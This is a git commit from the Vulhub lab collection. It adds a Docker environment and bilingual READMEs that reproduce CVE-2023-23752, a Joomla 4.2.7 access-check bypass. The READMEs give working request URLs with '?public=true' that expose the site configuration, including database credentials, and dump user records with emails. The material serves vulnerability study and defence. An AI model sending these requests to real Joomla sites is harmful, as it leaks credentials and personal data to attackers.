first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
joomla/CVE-2023-23752/1.png
Normal file
BIN
joomla/CVE-2023-23752/1.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 67 KiB |
BIN
joomla/CVE-2023-23752/2.png
Normal file
BIN
joomla/CVE-2023-23752/2.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 73 KiB |
BIN
joomla/CVE-2023-23752/3.png
Normal file
BIN
joomla/CVE-2023-23752/3.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 111 KiB |
47
joomla/CVE-2023-23752/README.md
Normal file
47
joomla/CVE-2023-23752/README.md
Normal file
@@ -0,0 +1,47 @@
|
||||
# Joomla improper access check in webservice endpoints (CVE-2023-23752)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Joomla is a free and open-source content management system (CMS) that allows users to build websites and online applications. It was first released in 2005 and has since become one of the most popular CMS platforms, powering millions of websites around the world.
|
||||
|
||||
An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
|
||||
|
||||
References:
|
||||
|
||||
- <https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html>
|
||||
- <https://xz.aliyun.com/t/12175>
|
||||
- <https://vulncheck.com/blog/joomla-for-rce>
|
||||
|
||||
## Vulnerable Environment
|
||||
|
||||
Execute following command to start a Joomla site 4.2.7:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
You can access the Joomla website through `http://your-ip:8080` after the server is started.
|
||||
|
||||
## Exploit
|
||||
|
||||
This issue is caused by an attribute overwrite issue, the attacker can use `public=true` to bypass the authorization check.
|
||||
|
||||
For example, expose all configuration including MySQL username and password through this link:
|
||||
|
||||
```
|
||||
http://your-ip:8080/api/index.php/v1/config/application?public=true
|
||||
```
|
||||
|
||||

|
||||
|
||||
Otherwise access is unauthorized without `public=true`:
|
||||
|
||||

|
||||
|
||||
Expose all users information including emails through this link:
|
||||
|
||||
```
|
||||
http://your-ip:8080/api/index.php/v1/users?public=true
|
||||
```
|
||||
|
||||

|
45
joomla/CVE-2023-23752/README.zh-cn.md
Normal file
45
joomla/CVE-2023-23752/README.zh-cn.md
Normal file
@@ -0,0 +1,45 @@
|
||||
# Joomla权限绕过漏洞(CVE-2023-23752)
|
||||
|
||||
Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。
|
||||
|
||||
在其4.0.0版本到4.2.7版本中,存在一处属性覆盖漏洞,导致攻击者可以通过恶意请求绕过权限检查,访问任意Rest API。
|
||||
|
||||
参考链接:
|
||||
|
||||
- <https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html>
|
||||
- <https://xz.aliyun.com/t/12175>
|
||||
- <https://vulncheck.com/blog/joomla-for-rce>
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
执行如下命令启动一个Joomla 4.2.7:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
服务启动后,访问`http://your-ip:8080`即可查看到Joomla页面。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
这个漏洞是由于错误的属性覆盖导致的,攻击者可以通过在访问Rest API时传入参数`public=true`来绕过权限校验。
|
||||
|
||||
比如,访问下面这个链接即可读取所有配置项,包括数据库连接用户名和密码:
|
||||
|
||||
```
|
||||
http://your-ip:8080/api/index.php/v1/config/application?public=true
|
||||
```
|
||||
|
||||

|
||||
|
||||
如果不添加`public=true`,则访问会被拒绝:
|
||||
|
||||

|
||||
|
||||
访问下面这个链接即可读取所有用户信息,包含邮箱等:
|
||||
|
||||
```
|
||||
http://your-ip:8080/api/index.php/v1/users?public=true
|
||||
```
|
||||
|
||||

|
18
joomla/CVE-2023-23752/docker-compose.yml
Normal file
18
joomla/CVE-2023-23752/docker-compose.yml
Normal file
@@ -0,0 +1,18 @@
|
||||
version: '2'
|
||||
services:
|
||||
web:
|
||||
image: vulhub/joomla:4.2.7
|
||||
depends_on:
|
||||
- mysql
|
||||
environment:
|
||||
- JOOMLA_DB_HOST=mysql
|
||||
- JOOMLA_DB_PORT=3306
|
||||
- JOOMLA_DB_USER=root
|
||||
- JOOMLA_DB_PASSWORD=vulhub
|
||||
- JOOMLA_DB_NAME=joomla
|
||||
ports:
|
||||
- "8080:80"
|
||||
mysql:
|
||||
image: mysql:5.7
|
||||
environment:
|
||||
- MYSQL_ROOT_PASSWORD=vulhub
|
Reference in New Issue
Block a user